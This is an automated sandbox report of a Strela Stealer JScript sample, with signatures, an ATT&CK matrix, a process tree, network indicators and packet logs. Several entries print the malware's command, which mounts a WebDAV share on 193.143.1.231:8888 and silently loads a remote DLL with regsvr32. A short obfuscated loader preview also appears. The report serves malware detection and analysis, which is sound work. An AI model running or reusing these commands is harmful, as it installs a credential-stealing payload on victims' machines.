              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_024FB690 push esp; iretd 11_2_024FB691

              Hooking and other Techniques for Hiding and Protection

              barindex
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 8888
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 8888
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 8888
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49709
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\net.exe TID: 7100Thread sleep time: -30000s >= -30000sJump to behavior
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: net.exe, 00000005.00000002.2185942636.0000013018318000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2185942636.0000013018382000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeCode function: CreateThread,GetLocaleInfoA,11_2_024B9A30
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Strela Stealer
              Source: Yara matchFile source: 11.2.regsvr32.exe.7ff8b7e00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.2271164628.00007FF8B7E10000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3144, type: MEMORYSTR
              Gathers information about network shares
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
              Opens network shares
              Source: C:\Windows\System32\regsvr32.exeFile opened: \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeFile opened: \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior

              Remote Access Functionality

              barindex
              Yara detected Strela Stealer
              Source: Yara matchFile source: 11.2.regsvr32.exe.7ff8b7e00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.2271164628.00007FF8B7E10000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3144, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information12
              Scripting              		Valid AccountsWindows Management Instrumentation12
              Scripting              		11
              Process Injection              		1
              Virtualization/Sandbox Evasion              		OS Credential Dumping2
              Network Share Discovery              		Remote Services1
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Process Injection              		LSASS Memory1
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media11
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
              Obfuscated Files or Information              		Security Account Manager1
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive11
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Regsvr32              		NTDS1
              File and Directory Discovery              		Distributed Component Object ModelInput Capture1
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets12
              System Information Discovery              		SSHKeylogging11
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1576785 Sample: 126484723232027823.js Startdate: 17/12/2024 Architecture: WINDOWS Score: 88 29 Yara detected Strela Downloader 2->29 31 Yara detected Strela Stealer 2->31 33 Uses known network protocols on non-standard ports 2->33 35 2 other signatures 2->35 8 wscript.exe 1 1 2->8         started        process3 signatures4 37 JScript performs obfuscated calls to suspicious functions 8->37 39 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->39 41 Gathers information about network shares 8->41 11 cmd.exe 1 8->11         started        process5 signatures6 45 Gathers information about network shares 11->45 14 cmd.exe 1 11->14         started        17 cmd.exe 1 11->17         started        19 conhost.exe 11->19         started        process7 signatures8 47 Gathers information about network shares 14->47 21 net.exe 7 14->21         started        24 regsvr32.exe 17->24         started        process9 dnsIp10 27 193.143.1.231, 49704, 49705, 49706 BITWEB-ASRU unknown 21->27 43 Opens network shares 24->43 signatures11

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              126484723232027823.js0%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://193.143.1.231/bcf3ed6d7050e40%Avira URL Cloudsafe
              http://193.143.1.231/dI0%Avira URL Cloudsafe
              http://193.143.1.231/0%Avira URL Cloudsafe
              http://193.143.1.231/0I0%Avira URL Cloudsafe
              http://193.143.1.231:8888/0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://193.143.1.231/dInet.exe, 00000005.00000002.2185942636.0000013018382000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://193.143.1.231/bcf3ed6d7050e4net.exe, 00000005.00000002.2185942636.00000130183A7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://193.143.1.231/0Inet.exe, 00000005.00000002.2185942636.0000013018382000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://193.143.1.231/net.exe, 00000005.00000002.2185942636.0000013018382000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://193.143.1.231:8888/net.exe, 00000005.00000002.2185942636.0000013018368000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2185942636.0000013018382000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              193.143.1.231
              		unknownunknown
              		57271BITWEB-ASRUtrue

              General Information

              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1576785
              Start date and time:2024-12-17 15:10:06 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 31s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:13
              Number of new started drivers analysed:1
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • GSI enabled (Javascript)
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:126484723232027823.js
              Detection:MAL
              Classification:mal88.rans.troj.spyw.evad.winJS@12/0@0/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 71%
              • Number of executed functions: 3
              • Number of non-executed functions: 11
              Cookbook Comments:
              • Found application associated with file extension: .js

              Warnings

              • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53, 172.202.163.200
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: 126484723232027823.js

              Simulations

              Behavior and APIs

              TimeTypeDescription
              09:11:02API Interceptor1x Sleep call for process: net.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              BITWEB-ASRUnew.batGet hashmaliciousUnknownBrowse
              • 193.143.1.46
              qL619hzCfc.batGet hashmaliciousUnknownBrowse
              • 193.143.1.46
              new.batGet hashmaliciousUnknownBrowse
              • 193.143.1.46
              https://cgd-assinar.comGet hashmaliciousUnknownBrowse
              • 193.143.1.14
              11iEly4m6C.batGet hashmaliciousUnknownBrowse
              • 193.143.1.46
              YnViC5yHLu.batGet hashmaliciousUnknownBrowse
              • 193.143.1.46
              new.batGet hashmaliciousUnknownBrowse
              • 193.143.1.46
              https://cmd-autenticacaogov.com/Get hashmaliciousUnknownBrowse
              • 193.143.1.14
              mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
              • 193.143.1.70
              sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
              • 193.143.1.70

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:ASCII text, with very long lines (11695), with no line terminators
              Entropy (8bit):4.75000181394305
              TrID:
                File name:126484723232027823.js
                File size:11'695 bytes
                MD5:09024cb4c452f96fe5b6045e198092ba
                SHA1:53f924039e79576a5b2e9b90e3c11c1116e933eb
                SHA256:0ff304716b215d4fadbf9fee1be5d717c454a09f6bdbe6e42e29995d969964e8
                SHA512:5e0146dc0e358a0a78964abceb2cf735fd1c7d9e0efaae05a0ad39d441c5329a88f0ff28ce5a6171690963398eb4884219db77e66316348b38f2a979dcb4b494
                SSDEEP:192:JxTxIOSN8HHdiTp9JRSSZxSSGSSZxSSf1OSSB5SS3uVX+++QZPP/RvOSSZxSS5nK:P1y1uVIuuVOhpD
                TLSH:6832BF9DB6E4F44818FE9100336291106DA6747E7F32CB2DB3EE998866443F59ED703A
                File Content Preview:function ftewq(){this[hfgkhke+iqkshjqkp+conprmvk+mwncmi](gebyyu+eoztg+jqskgadc+jvaxx+xqqrniwzz+zxqbq+qtwic+cblmmvh+cblmmvh+iqkshjqkp+acrinokm+qtwic+gebyyu+conprmvk+djwmv+ktqhqp+djwmv+woscoo+acrinokm+gbeabu+cblmmvh+oindqeulx+zxqbq+jvaxx+ktqhqp+qxdyfx+jqskg

                File Icon

                Icon Hash:68d69b8bb6aa9a86

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 17, 2024 15:11:02.211962938 CET497048888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:02.332076073 CET888849704193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:02.332195997 CET497048888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:02.332396984 CET497048888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:02.451977968 CET888849704193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:03.779273987 CET888849704193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:03.820857048 CET497048888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:07.063460112 CET497058888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:07.183239937 CET888849705193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:07.183357000 CET497058888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:07.183607101 CET497058888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:07.303334951 CET888849705193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:08.594680071 CET888849705193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:08.648992062 CET497058888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:08.746246099 CET497068888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:08.865962029 CET888849706193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:08.866081953 CET497068888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:08.866297960 CET497068888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:08.985980988 CET888849706193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:10.288436890 CET888849706193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:10.301013947 CET497078888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:10.336456060 CET497068888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:10.420839071 CET888849707193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:10.421030045 CET497078888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:10.421256065 CET497078888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:10.540878057 CET888849707193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:11.848124981 CET888849707193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:11.895764112 CET497048888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:11.899044991 CET497078888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:11.978322983 CET497088888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:12.098644018 CET888849708193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:12.098759890 CET497088888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:12.098902941 CET497088888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:12.218466043 CET888849708193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:13.516463041 CET888849708193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:13.520878077 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:13.570925951 CET497088888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:13.640739918 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:13.640858889 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:13.641015053 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:13.760725021 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.072145939 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.074902058 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.074922085 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.075037003 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.086370945 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.086390018 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.086463928 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.099102020 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.099122047 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.099184036 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.111793995 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.111814022 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.111884117 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.124532938 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.180293083 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.218578100 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.231935978 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.232074976 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.264075994 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.291497946 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.291605949 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.338080883 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.351447105 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.351562977 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.410964012 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.410985947 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.410998106 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.411086082 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.470928907 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.470949888 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.471143007 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.477289915 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.477307081 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.477374077 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.490029097 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.490047932 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.490160942 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.502736092 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.502753019 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.502763987 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.502830029 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.515563011 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.515580893 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.515675068 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.528162003 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.528182030 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.528247118 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.540970087 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.541033983 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.541194916 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.553602934 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.553641081 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.553675890 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.553685904 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.553725958 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.566267014 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.566304922 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.566382885 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.580423117 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.580460072 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.580495119 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.580663919 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.591954947 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.591989994 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.592031002 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.604746103 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.604820967 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.608196020 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.608230114 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.608289003 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.619597912 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.619635105 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.619703054 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.631165981 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.631203890 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.631254911 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.642529011 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.642581940 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.642662048 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.654021025 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.654068947 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.654141903 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.666656017 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.666703939 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.666779041 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.676817894 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.676865101 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.676940918 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.688421965 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.688472033 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.688535929 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.699711084 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.705761909 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.705811024 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.705818892 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.717216015 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.717262983 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.717283010 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.729928970 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.729980946 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.729986906 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.740099907 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.740164995 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.740173101 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.753079891 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.753118038 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.753170967 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.764992952 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.765038013 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.765058041 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.776937008 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.776957989 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.777017117 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.789092064 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.789139032 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.789165020 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.789170980 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.789232016 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.801170111 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.801208973 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.801265955 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.813159943 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.813226938 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.813277006 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.825174093 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.825229883 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.825278997 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.837229967 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.837277889 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.837313890 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.837337971 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.849147081 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.849205971 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.849240065 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.860951900 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.861006975 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.861015081 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.872701883 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.872757912 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.872800112 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.884362936 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.884414911 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.884435892 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.895843983 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.895883083 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.895904064 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.895916939 CET888849709193.143.1.231192.168.2.5
